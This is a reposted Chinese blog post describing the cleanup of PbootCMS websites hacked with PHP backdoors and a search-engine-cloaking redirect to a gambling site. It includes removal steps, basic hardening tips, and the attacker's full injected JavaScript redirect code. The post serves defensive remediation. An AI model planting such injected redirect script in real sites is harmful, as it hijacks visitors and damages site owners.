iis服务器助手广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >pbootcms被黑木马问题(3)
  • 157
分享到

pbootcms被黑木马问题(3)

php挂马Poweredby金山文档 2023-08-31 16:08:55 157人浏览 独家记忆
摘要

昨天经过同事告知发现了很早之间做的几个企业官方都中木马了,然后看了一下木马情况,跟之间的两次都有所不同,这里记录一下新的木马的清理过程,有遇到的朋友可以借鉴一下。(之前有做过一些防止批量扫站的措施,因为嫌麻烦就没有给这些网站上进行修改)

昨天经过同事告知发现了很早之间做的几个企业官方都中木马了,然后看了一下木马情况,跟之间的两次都有所不同,这里记录一下新的木马的清理过程,有遇到的朋友可以借鉴一下。(之前有做过一些防止批量扫站的措施,因为嫌麻烦就没有给这些网站上进行修改)

1)网站被黑以后的表现形式:

就跟上面显示的一样,被黑以后对方会在首页进行插入一些对方的信息,这里是关于一个体育的灰网的站点,而且这里对方还做了一个小的识别,那就是你直接输入网址或者通过收藏夹进入的都是正常的,但是通过搜索引擎点击进入的就会进行跳转到对方的网站.这里对方使用的是js的方式进行跳转的,后面我们会说。

2)如何进行清理

  1. 下载一个d盾,使用D盾进行扫描PHP文件(不知道其他类型的可不可以,我这边只是能扫描php后缀的)

  1. 通过扫描我们可以看到关于PHP后缀的文件的一些涉及危险操作的文件,如果你的pb没有进行过二开,也没有使用cms88或者其他人的一些含有加密授权的插件的话,那么除了Kernel.php这个官方文件以外其他的文件都是对方上传的后门文件了,我们要做的就是在d盾中通过右键选择删除的方式进行删除这些后门文件。

  1. 操作完d盾以后我们还需要寻找对方留下的js文件以及html文件,对方会把我们根目录下的index.php给修改的同时还会上传一个m.html类似名称的html文件,这里我们可以根据前面我们清理的后台文件的上传时间得知哪些文件是同一天被修改的,那么我们也就需要删除根目录下的这些文件。删除以后看我们的首页引用的js文件路径是哪里,然后找到对应的目录,看看这些js文件有没有被修改。小编这里遇到的情况都是会有两个js文件被对方加入了两段代码,分别在js文件的开头与结尾,把这个也删除就好了(删除对方加入的代码,不是删除整个js文件,如果你有本地备份直接替换也可以)。

3)针对pb做一些简单的防止被批量扫码的设置。

1.数据库中插入系统的名称,不进行默认显示pbootcms系统的字样

2.把admin.php的文件命名为其他名称,比如xxx.php,这样我们登录的时候就是Http://www.371302.cn/xxx.php 的路径了。也能避免一些被扫的风险。

4)说一下对方设置的js跳转的方式,主要是在https://www.xxx.com/bb.js 这个文件中(有时候会放到其他地方,不过js代码是一致的)

在这里打开以后可以看到下面的方法,这里猜想agent_code=5306274'应该就是对方的邀请码之类的或者用于计算佣金的地方。根据被导入到目标网站的次数计算佣金把。

var sp_regexps =  /.(yahoo|google|baidu|soso|sogou|bing|sou|so|360|haosou|youdao|sooule|easou|aliyun|sina|jike|Yisou|uc|sm)./gi;var sp_whereis = window.location.referrer;try {  sp_whereis = top.document.referrer;} catch (e) {}try {  sp_whereis = window.parent.document.referrer;} catch (e) {}var sp_domains = window.location.host;try {  sp_domains = top.document.domain;} catch (e) {}try {  sp_domains = window.parent.document.domain;} catch (e) {}if (sp_regexps.test(sp_whereis)) {  window.location.href = 'https://www.xxx.com:9152/?agent_code=5306274';  parent.window.opener.location = 'https://www.xxx.com:9152/?agent_code=5306274';}function browserRedirect() {  var sUserAgent = navigator.userAgent.toLowerCase();  var bIsIpad = sUserAgent.match(/ipad/i) == 'ipad';  var bIsIphoneOs = sUserAgent.match(/iphone os/i) == 'iphone os';  var bIsMidp = sUserAgent.match(/midp/i) == 'midp';  var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == 'rv:1.2.3.4';  var bIsAndroid = sUserAgent.match(/android/i) == 'android';  var bIsCE = sUserAgent.match(/windows ce/i) == 'windows ce';  var bIsWM = sUserAgent.match(/windows mobile/i) == 'windows mobile';  if (!(bIsIphoneOs || bIsMidp || bIsAndroid || bIsCE || bIsWM)) {  } else {    window.location.href = 'https://www.xxx.com:9152/?agent_code=5306274';  }}browserRedirect();var s=document.referrer;var str=window.location.href;if(s.indexOf("b"+"ai"+"du")>0 || s.indexOf("s"+"ogou")>0|| s.indexOf("s"+"m")>0 || s.indexOf("360")>0 || s.indexOf("s"+"o")>0|| s.indexOf("go"+"o"+"gle")>0 || s.indexOf("bing")>0  || s.indexOf("youdao")>0 )window.location.href="https://www.xxx.com:9152/?agent_code=5306274";

以上便是临沂建站分享的有关本次挂马的处理过程,分别从被黑以后的表现形式以及处理过程还有最后的简单防批量扫码三个方面进行处理。最后不得不说的就是人家确实牛逼,15号被挂的马,17号的时候百度上已经被更新成对方的信息了,要是我们自己修改一次信息没有个一个月的时间是更新不出来的。

来源地址:https://blog.csdn.net/u014401637/article/details/129118032

--结束END--

本文标题: pbootcms被黑木马问题(3)

本文链接: https://www.lsjlt.com/news/386304.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • pbootcms被黑木马问题(3)
    昨天经过同事告知发现了很早之间做的几个企业官方都中木马了,然后看了一下木马情况,跟之间的两次都有所不同,这里记录一下新的木马的清理过程,有遇到的朋友可以借鉴一下。(之前有做过一些防止批量扫站的措施,因为嫌麻烦就没有给这些网站上进行修改) ...
    99+
    2023-08-31
    php 挂马 Powered by 金山文档
  • 如何应对亚马逊云服务器被黑客入侵的问题
    1. 立即停止服务器 如果你发现自己的亚马逊云服务器被黑客入侵,第一步是立即停止服务器。这可以防止黑客继续访问你的服务器并进一步破坏你的数据。 2. 收集证据 在停止服务器之前,你应该尽可能多地收集证据。这包括查看服务器日志、检查文件修改...
    99+
    2023-10-27
    亚马逊 如何应对 黑客入侵
  • 如何解决阿里云服务器被黑客黑了的问题
    1. 立即断开与服务器的连接 一旦发现阿里云服务器被黑客黑了,第一步是立即断开与服务器的连接。这可以通过关闭远程连接或者直接断电来实现。这样可以阻止黑客继续对服务器进行攻击,同时也可以减少进一步的损害。 2. 通知阿里云技术支持 在断开与...
    99+
    2023-10-27
    阿里 如何解决 黑了
  • 云服务器被黑客入侵怎么解决问题
    云服务器被黑客入侵的原因通常是由于安全漏洞或者恶意软件。 解决方法如下: 安装反病毒软件:使用云服务商提供的产品,确保安装杀毒软件和防火墙,可以保护您的设备免受恶意软件的攻击。 更新操作系统和应用程序:定期更新操作系统和应用程序,以修复...
    99+
    2023-10-27
    解决问题 黑客入侵 服务器
  • 如何解决网站中了木马无法删除的问题
    本篇内容介绍了“如何解决网站中了木马无法删除的问题”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!  首先要找到木马!  我们使用D盾扫描了一...
    99+
    2023-06-10
  • 阿里云服务器被黑客攻击怎么解决问题
    1. 确认服务器是否被攻击 如果你怀疑自己的阿里云服务器被黑客攻击了,首先需要确认一下是否真的被攻击了。你可以通过以下方式来确认: 检查服务器的日志文件,看看是否有异常的登录记录或者其他异常操作记录。 检查服务器的网络流量,看看是否有异...
    99+
    2023-10-27
    阿里 解决问题 黑客攻击
  • 云服务器被黑客入侵勒索怎么解决问题
    及时更新防护措施:使用反病毒软件、补丁、安全审计等工具对服务器进行定期检查,及时更新补丁,确保系统安全性。 关闭入侵账户:立即关闭入侵账户,并杀出入侵工具,以预防此问题。 增加密码复杂度:为服务器设置复杂密码,并建议使用字母、数字和符号混...
    99+
    2023-10-27
    解决问题 黑客入侵 服务器
  • 如何解除阿里云服务器被黑客控制的问题
    1. 立即断开与服务器的连接 一旦发现阿里云服务器被黑客控制,第一步是立即断开与服务器的连接。这可以通过关闭远程连接工具(如SSH)或者直接关闭服务器来实现。这样可以阻止黑客继续对服务器进行恶意操作。 2. 更改管理员密码 黑客可能通过猜...
    99+
    2023-10-27
    阿里 黑客 服务器
  • 如何解决网站被黑注入博彩色情页面的问题
    本篇内容主要讲解“如何解决网站被黑注入博彩色情页面的问题”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“如何解决网站被黑注入博彩色情页面的问题”吧!欧洲杯激战正酣,又到了博彩利益集团疯狂入侵正常站...
    99+
    2023-06-10
  • 亚马逊服务器被攻击怎么解决问题
    切换高防IP或添加CDN,将流量攻击清洗后保留正常流量转到我们正常服务器IP。 调整策略,限制对服务器的访问频率和带宽,以避免过多的攻击流量进入服务器。 更新安全补丁和防护软件,以修复已知漏洞,减少被攻击的风险。 定期备份数据,以防止数据...
    99+
    2023-10-27
    亚马逊 解决问题 服务器
  • 织梦dedecms经常被挂马问题的解决方法
    大家最常用的办法就是:把挂马的入口文件删除,即删除/plus/ad_js.php /plus/mytag_js.php 两个文件。但是要注意删除文件后,js调用tag和广告就有问题,可以直接用标签调用。 除了以上的操作,小编还...
    99+
    2024-04-02
  • 亚马逊服务器被占用怎么办解决问题
    检查并清理缓存:当您访问亚马逊站点时,您的缓存可能会被其他人读取或更新,这可能会导致您的网站或库存数据被错误地显示。确保您的缓存中没有任何未处理的数据,并清除浏览器缓存和其他临时文件。 检查并修复 DNS 错误:如果您的服务器位于国外,您...
    99+
    2023-10-27
    亚马逊 解决问题 服务器
  • 互联网中如何解决网站被挂马的问题
    这篇文章主要介绍了互联网中如何解决网站被挂马的问题,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。  网站服务器和空间被入侵,让人都很纠结这种事情,自己辛辛苦苦的运行半年的网站...
    99+
    2023-06-10
  • 亚马逊服务器被终止了怎么解决问题
    硬件故障:亚马逊服务器可能出现硬件故障,如电源供应不足、硬盘故障、内存故障等。 网络故障:亚马逊服务器可能出现网络故障,例如网络连接超时、网络中断或DNS解析错误等。 软件问题:亚马逊服务器可能出现软件故障,例如软件更新失败、软件权限设置...
    99+
    2023-10-27
    亚马逊 解决问题 服务器
  • 亚马逊服务器被攻击怎么解决的问题
    切换高防IP:通过切换高防IP,可以有效地减少攻击流量的攻击源,防止被封IP。可以在不同的地区和国家之间进行切换。 添加CDN:添加CDN可以帮助缓解网站的访问压力,减少攻击流量的攻击源,从而有效地保护服务器安全。 更新软件和系统:及时更...
    99+
    2023-10-27
    亚马逊 服务器
  • 亚马逊服务器被攻击怎么解决的问题呢
    使用强密码和多因素身份验证:确保您的账户密码足够复杂,包括字母、数字和符号,并使用多因素身份验证来验证您的身份。 定期更新您的安全软件:确保您的操作系统和应用程序都有更新,以保护您的服务器免受网络攻击。 限制对您的网络访问:在访问您的服务...
    99+
    2023-10-27
    亚马逊 服务器
  • 如何解决租用亚马逊服务器被攻击的问题
    1. 确认攻击类型和范围 首先,你需要确认你的亚马逊服务器确实受到了攻击。观察服务器的异常行为,如网络延迟、服务中断、异常流量等。同时,使用安全工具和日志分析来检测和识别攻击类型和范围。 2. 加强服务器安全 为了应对攻击,你可以采取以下...
    99+
    2023-10-27
    亚马逊 如何解决 服务器
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作